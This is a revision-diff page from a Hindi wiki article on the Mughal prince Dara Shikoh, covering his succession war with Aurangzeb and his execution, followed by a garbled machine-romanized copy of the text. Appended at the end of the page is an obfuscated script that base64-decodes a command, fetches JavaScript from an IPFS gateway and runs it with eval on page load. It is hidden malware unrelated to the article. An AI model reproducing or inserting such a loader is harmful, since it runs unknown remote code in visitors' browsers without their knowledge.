Difference between revisions of "दारा शिकोह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 12: Line 12:
 
*दारा की उम्र इस समय 43 वर्ष की थी और वह पिता के [[तख़्त-ए-ताऊस]] को उत्तराधिकार में पाने की उम्मीद रखता था। लेकिन तीनों छोटे भाइयों, ख़ासकर औरंगज़ेब ने उसके इस दावे का विरोध किया।  
 
*दारा की उम्र इस समय 43 वर्ष की थी और वह पिता के [[तख़्त-ए-ताऊस]] को उत्तराधिकार में पाने की उम्मीद रखता था। लेकिन तीनों छोटे भाइयों, ख़ासकर औरंगज़ेब ने उसके इस दावे का विरोध किया।  
 
*फलस्वरूप दारा को उत्तराधिकार के लिए अपने इन भाइयों के साथ में युद्ध करना पड़ा (1657-58 ई.)। लेकिन शाहजहाँ के समर्थन के बावजूद दारा की फ़ौज 15 अप्रैल 1658 ई. को धर्मट के युद्ध में औरंगज़ेब और [[मुराद बख़्श]] की संयुक्त फ़ौज से परास्त हो गई।  
 
*फलस्वरूप दारा को उत्तराधिकार के लिए अपने इन भाइयों के साथ में युद्ध करना पड़ा (1657-58 ई.)। लेकिन शाहजहाँ के समर्थन के बावजूद दारा की फ़ौज 15 अप्रैल 1658 ई. को धर्मट के युद्ध में औरंगज़ेब और [[मुराद बख़्श]] की संयुक्त फ़ौज से परास्त हो गई।  
*इसके बाद दारा अपने बाग़ी भाइयों को दबाने के लिए दुबारा खुद अपने नेतृत्व में शाही फ़ौजों के साथ निकला, किन्तु इस बार भी उसे 29 मई 1658 ई. को सामूगढ़ के युद्ध में पराजय का मुँह देखना पड़ा। इस बार दारा के लिये [[आगरा]] वापस लौटना सम्भव नहीं था। वह शरणार्थी बन गया और [[पंजाब]], [[कच्छ]], [[गुजरात]] एवं [[राजपूताना]] में भटकने के बाद तीसरी बार फिर एक बड़ी सेना तैयार करने में सफल रहा।  
+
*इसके बाद दारा अपने बाग़ी भाइयों को दबाने के लिए दुबारा खुद अपने नेतृत्व में शाही फ़ौजों के साथ निकला, किन्तु इस बार भी उसे 29 मई 1658 ई. को [[सामूगढ़]] के युद्ध में पराजय का मुँह देखना पड़ा। इस बार दारा के लिये [[आगरा]] वापस लौटना सम्भव नहीं था। वह शरणार्थी बन गया और [[पंजाब]], [[कच्छ]], [[गुजरात]] एवं [[राजपूताना]] में भटकने के बाद तीसरी बार फिर एक बड़ी सेना तैयार करने में सफल रहा।  
 
*दौराई में अप्रैल 1659 ई. में औरंगज़ेब से उसकी तीसरी और आख़िरी मुठभेड़ हुई। इस बार भी वह फिर से हारा। दारा फिर शरणार्थी बनकर अपनी जान बचाने के लिए राजपूताना और कच्छ होता हुआ सिन्ध गया। यहाँ पर उसकी प्यारी बेग़म नादिरा का इंतक़ाल हो गया।  
 
*दौराई में अप्रैल 1659 ई. में औरंगज़ेब से उसकी तीसरी और आख़िरी मुठभेड़ हुई। इस बार भी वह फिर से हारा। दारा फिर शरणार्थी बनकर अपनी जान बचाने के लिए राजपूताना और कच्छ होता हुआ सिन्ध गया। यहाँ पर उसकी प्यारी बेग़म नादिरा का इंतक़ाल हो गया।  
 
*दारा ने दादर के [[अफ़ग़ान]] सरदार जीवन ख़ान का आतिथ्य स्वीकार किया। किन्तु [[मलिक जीवन ख़ान]] गद्दार साबित हुआ, और उसने दारा को औरंगज़ेब की फ़ौज के हवाले कर दिया, जो इस बीच बराबर उसका पीछा कर रही थी। दारा को बन्दी बनाकर [[दिल्ली]] लाया गया, जहाँ औरंगज़ेब के आदेश पर उसे भिख़ारी की पोशाक़ में एक छोटी सी हथिनी पर बैठाकर सड़कों पर घुमाया गया। इसके बाद मुल्लाओं के सामने उसके ख़िलाफ़ मुक़दमा चलाया गया।  
 
*दारा ने दादर के [[अफ़ग़ान]] सरदार जीवन ख़ान का आतिथ्य स्वीकार किया। किन्तु [[मलिक जीवन ख़ान]] गद्दार साबित हुआ, और उसने दारा को औरंगज़ेब की फ़ौज के हवाले कर दिया, जो इस बीच बराबर उसका पीछा कर रही थी। दारा को बन्दी बनाकर [[दिल्ली]] लाया गया, जहाँ औरंगज़ेब के आदेश पर उसे भिख़ारी की पोशाक़ में एक छोटी सी हथिनी पर बैठाकर सड़कों पर घुमाया गया। इसके बाद मुल्लाओं के सामने उसके ख़िलाफ़ मुक़दमा चलाया गया।  

Revision as of 06:29, 9 February 2011

  • mugal badashah shahajahaan ka sabase b da putr tha.
  • mumataz begam usaki mata thian.
  • arambh mean dara shikoh panjab ka soobedar banaya gaya, jisaka shasan vah rajadhani se apane pratinidhiyoan ke zariye chalata tha.
  • shahajahaan apane putroan mean sabase zyada isi ko chahata tha aur use amataur par apane sath hi darabar mean rakhata tha.
  • dara bahadur insan tha aur bauddhik drishti se use apane prapitamah akabar ke gun virasat mean mile the.
  • vah soofivad ki or unmukh tha aur islam ke hanafi panth ka anuyayi tha.
  • barniyar ne apani pustak 'barniyar ki bharat yatra' mean likha hai - 'dara mean achchhe gunoan ki kami nahian thi. vah mitabhashi, hazir javab, namr aur atyant udar purush tha. parantu apane ko vah bahut buddhiman aur samajhadar samajhata tha aur usako is bat ka ghamand tha ki apane buddhibal aur prayatn se vah har kam ka prabandh kar sakata hai. vah yah bhi samajhata tha ki jagat mean aisa koee vyakti nahian jo usako kisi bat ki shiksha de sake. jo log darate darate use kuchh salah dene ka sahas kar baithate, unake sath vah bahut bura baratav karata. is karan usake sachche shubhachiantak bhi usake bhaiyoan ke yatnoan aur chaloan se use soochit n kar sake. vah darane aur dhamakane mean b da nipun tha yahaan tak ki b de b de umara ko bura bhala kahane aur unake apaman kar dalane mean bhi vah sankoch n karata tha parantu saubhagy ki bat yah thi ki usaka krodh shighr hi shaant ho jata tha.'[1]
  • vah sabhi dharm majahaboan ka adar karata tha aur hindoo dharm darshan v eesaee dharm mean vishesh dilachaspi rakhata tha. usake in udar vicharoan se kupit hokar kattarapanthi musalamanoan ne us par islam ke prati anastha phailane ka arop lagaya.
  • is paristhiti ka dara ke tisare bhaee aurangazeb ne khoob fayada uthaya.
  • dara ne 1653 ee. mean kandhar ki tisari gherabandi mean bhag liya tha. yadyapi vah is abhiyan mean viphal raha, phir bhi apane pita ka kripapatr bana raha.
  • 1657 ee. mean jab shahajahaan bimar p da to vah usake pas mean maujood tha.
  • dara ki umr is samay 43 varsh ki thi aur vah pita ke takht-e-taoos ko uttaradhikar mean pane ki ummid rakhata tha. lekin tinoan chhote bhaiyoan, khasakar aurangazeb ne usake is dave ka virodh kiya.
  • phalasvaroop dara ko uttaradhikar ke lie apane in bhaiyoan ke sath mean yuddh karana p da (1657-58 ee.). lekin shahajahaan ke samarthan ke bavajood dara ki fauj 15 aprail 1658 ee. ko dharmat ke yuddh mean aurangazeb aur murad bakhsh ki sanyukt fauj se parast ho gee.
  • isake bad dara apane bagi bhaiyoan ko dabane ke lie dubara khud apane netritv mean shahi faujoan ke sath nikala, kintu is bar bhi use 29 mee 1658 ee. ko samoogadh ke yuddh mean parajay ka muanh dekhana p da. is bar dara ke liye agara vapas lautana sambhav nahian tha. vah sharanarthi ban gaya aur panjab, kachchh, gujarat evan rajapootana mean bhatakane ke bad tisari bar phir ek b di sena taiyar karane mean saphal raha.
  • dauraee mean aprail 1659 ee. mean aurangazeb se usaki tisari aur akhiri muthabhe d huee. is bar bhi vah phir se hara. dara phir sharanarthi banakar apani jan bachane ke lie rajapootana aur kachchh hota hua sindh gaya. yahaan par usaki pyari begam nadira ka iantaqal ho gaya.
  • dara ne dadar ke afagan saradar jivan khan ka atithy svikar kiya. kintu malik jivan khan gaddar sabit hua, aur usane dara ko aurangazeb ki fauj ke havale kar diya, jo is bich barabar usaka pichha kar rahi thi. dara ko bandi banakar dilli laya gaya, jahaan aurangazeb ke adesh par use bhikhari ki poshaq mean ek chhoti si hathini par baithakar s dakoan par ghumaya gaya. isake bad mullaoan ke samane usake khilaf muqadama chalaya gaya.
  • dharmadroh ke abhiyog mean mullaoan ne use maut ki saja di.
  • 30 agast, 1659 ee. ko is saza ke tahat dara ka sir kat liya gaya. usaka b da putr suleman pahale se hi aurangazeb ka bandi tha.
  • 1662 ee. mean aurangazeb ne jel mean usaki bhi hatya kar di. dara ke doosare putr se separaharashikoh ko bakhsh diya gaya, jisaki shadi bad mean aurangazeb ki tisari l daki se huee.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani

  1. barniyar ki bharat yatra (hindi) (php) pustak.org. abhigaman tithi: 24.10, 2010.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>